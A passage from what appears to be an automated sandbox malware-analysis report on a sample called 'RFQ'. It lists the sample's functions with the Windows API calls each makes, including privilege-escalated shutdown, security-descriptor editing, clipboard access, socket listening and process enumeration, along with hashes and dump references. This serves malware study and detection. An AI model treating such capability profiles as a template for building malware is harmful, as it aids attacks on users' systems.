                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                          Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2192556992-3457252023
                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                          Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                          • String ID: %.3d
                                                                          • API String ID: 3337348382-986655627
                                                                          • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                          • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                          Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                          Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 2938487562-3733053543
                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                          Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                          Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                          • String ID:
                                                                          • API String ID: 1158019794-0
                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                          Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                          Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                          Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_strncmp
                                                                          • String ID: @oH$\$^$h
                                                                          • API String ID: 2175499884-3701065813
                                                                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                          Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                          • String ID:
                                                                          • API String ID: 540024437-0
                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                          Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                          • API String ID: 0-2872873767
                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                          Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2547909840-0
                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                          Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
